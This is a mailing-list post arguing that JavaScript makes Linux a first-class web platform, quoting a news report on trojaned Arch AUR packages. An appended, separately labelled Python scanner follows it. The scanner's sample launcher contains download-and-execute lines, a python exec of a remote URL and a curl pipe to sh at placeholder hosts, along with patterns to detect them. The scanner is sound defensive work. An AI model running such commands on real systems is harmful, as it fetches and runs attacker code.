[GoLUG] JS allows Linux to be a first class citizen on the internet.
Ron
ron at bclug.ca
Wed Aug 27 05:22:57 EDT 2025
TL;DR - Sorry, I rambled a bit.
JS is okay - safe, fast, powerful, and has amazing development environments.
And, it allows Linux desktops to be first class citizens on the internet
because applications can be delivered in a browser instead of Youtube.exe.
That is good. No more hacking Wine to get i.e. Jitsi.exe to run.
Barry Fishman wrote on 2025-08-22 12:13:
>>> Couldn't independently reviewed repositories exist, so people
>>> building websites could have some validation that the software
>>> they use has had at least some vetting?
>>
>> Sure, but who's going to pay for that?
>
> Who is paying for all the damage that is being done to sites that
> have been burned by JS's lack of validation?
What damage? It's not like sites are going offline frequently. I can't
remember the last time a site I frequently visit was offline, never mind
due to JS.
Anyway, site owners are responsible for their sites unless they're
attacked, then the hackers are responsible (due diligence required by
owners, etc.)
> As long as we refuse to deal with actually solving problems, rather
> than by passing the responsibility around, things are just going to
> get worse and more expensive for everyone. We know the answer to
> your question. We just refuse to hear it.
I think I agree with what you're saying - unvetted libraries are problems.
Reinventing the wheel is also a problem.
A balance is needed and I am not sure what that is.
Only use libraries from reputable sources?
I personally am very hesitant to include any old node package unless
it's widely used for that reason.
> At least under Linux, most users of these packages get them through
> their OS vendor.
Yup, it's been remarkably successful.
Hang on, breaking news... A distro's repos have been distributing
malware written in Python in July 2025:
> Arch AUR Under Fire Once More as Malware Resurfaces
>
> Just ten days after a previous incident, malware with a Remote
> Access Trojan has once again been discovered in Arch Linux AUR
> packages.
>
> Just ten days ago, a few software packages in the AUR were found to
> contain a Remote Access Trojan (RAT), hidden in packages tied to
> some of the most popular web browsers. Of course, the AUR team
> acted quickly and pulled them right away. But now, here we are again—
> it’s happened all over.
>
> before Chrome even starts, the script runs a python command that
> pulls in an external resource. That resource then downloads and
> launches malicious software every single time you start Chrome.
https://linuxiac.com/arch-aur-under-fire-once-more-as-malware-resurfaces/
The Linux repo method has been very successful, despite this story
quoted above from less than a month ago.
Now, to be fair, AUR, like Ubuntu / Debian(?) multiverse repo are *not*
curated.
Indeed, Canonical has a recent plan (ESM) to provide curated multiverse
repository packages; it requires an account, gives multiple free hosts for
home users and small businesses, but the big guys need to pay for it.
> Ubuntu ESM is an offering from Canonical... When an Ubuntu release
> reaches the end of its standard support cycle, it no longer receives
> regular security updates. Ubuntu ESM fills this gap by providing
> security updates for critical and important CVE (Common
> Vulnerabilities and Exposures) issues for an additional period.
https://linuxvox.com/blog/ubuntu-esm/
Users freaked the F right out about that, of course. They didn't want to
upgrade, didn't want to sign up for a free account to get curated *old*
versions of the software they get for free.
> Why this is such a problem with JS is because the code actually
> being used on internet sites is not visible, or how often it is
> updated.
JS code can be de-minified (if it weren't minified then people would
complain it's too big).
Web sites tend to / can update more frequently than most Linux distros.
But again, it's pretty well sandboxed, and while a crypto-miner would
suck, closing the tab solves that problem.
> Each site is managed by a small team of overworked
> developers, who are evaluated on how quickly they get things
> implemented and not how they get it done.
That sounds like every commercial development process, so why single out
JS developers?
> What do you expect?
A fair & reasonable comparison between what JS can deliver vs its security.
If JS weren't as powerful (and fast) as it is, we'd all be running
jitsi.exe in Wine and trying infinite hacks to get the most basic things
working. Remember those days?
Linux is a first class citizen on the internet *because of JS*.
No more "works best in IE6" at banking web sites, nor anywhere else
(okay, now Chrome monopoly is bringing that back a bit and I hate it).
Almost all modern services are available in a browser and fully
accessible on Linux or even on mobile.
Without JS, that would not happen.
Any discussion of alternate languages is mostly like fantasy sportsball
teams - a waste of time. It may not have been the 100% best choice but
it does a good job now. There are countless examples of not-best-thing
winning (VHS, etc ad nauseam).
And tech sites with billions of users are not falling over every month
due to JS. Not every year. Not really ever.
The tools (ReactJS, node, Angular, ...) are pretty darned nice to work
with, and ReactJS is pretty strict about not allowing Bad Code and
enforcing web standards on developers.
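The AUR incident quoted above describes a browser wrapper script that runs a python command to pull an external resource every time the browser starts. As an added example (not part of the original post or of any AUR package), here is a small defender-side scanner that walks the lines of a launcher script and flags interpreter or download commands that reference a remote URL; the launcher text is constructed, and the example.invalid hosts are placeholders.

```python
import re
from typing import Dict, List

# Constructed sample launcher script (hypothetical, not real AUR content).
SAMPLE_LAUNCHER = """#!/bin/sh
# wrapper for a browser (constructed example)
export LANG=C
python3 -c "import urllib.request;exec(urllib.request.urlopen('http://example.invalid/x.py').read())"
curl -fsSL https://example.invalid/payload.sh | sh
exec /usr/bin/chromium "$@"
"""

INTERPRETERS = {"python", "python2", "python3", "perl", "node", "ruby", "sh", "bash"}
FETCHERS = {"curl", "wget"}
URL_RE = re.compile(r"https?://[^\s'\"]+")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|python3?)\b")


def scan_launcher(text: str) -> List[Dict]:
    """Return one finding per line that fetches or executes remote content."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines, comments and the shebang are not commands
        urls = URL_RE.findall(stripped)
        # Crude tokenisation: split on whitespace and shell separators, then
        # keep only the basename so /usr/bin/curl and curl look the same.
        tokens = re.split(r"[\s|;&()]+", stripped)
        cmds = {t.rsplit("/", 1)[-1] for t in tokens if t}
        reasons = []
        if urls and (cmds & FETCHERS or "urlopen" in stripped or "requests." in stripped):
            reasons.append("downloads a remote URL")
        if PIPE_TO_SHELL_RE.search(stripped):
            reasons.append("pipes output into an interpreter")
        if urls and cmds & INTERPRETERS and ("-c" in tokens or "-e" in tokens):
            reasons.append("inline interpreter code references a URL")
        if reasons:
            findings.append({"line": lineno, "urls": urls, "reasons": reasons, "text": stripped})
    return findings


if __name__ == "__main__":
    for f in scan_launcher(SAMPLE_LAUNCHER):
        print(f"line {f['line']}: {', '.join(f['reasons'])} -> {f['text']}")
```

Running it on a package's install or wrapper scripts before installation is a cheap pre-check; it does not replace reading the PKGBUILD.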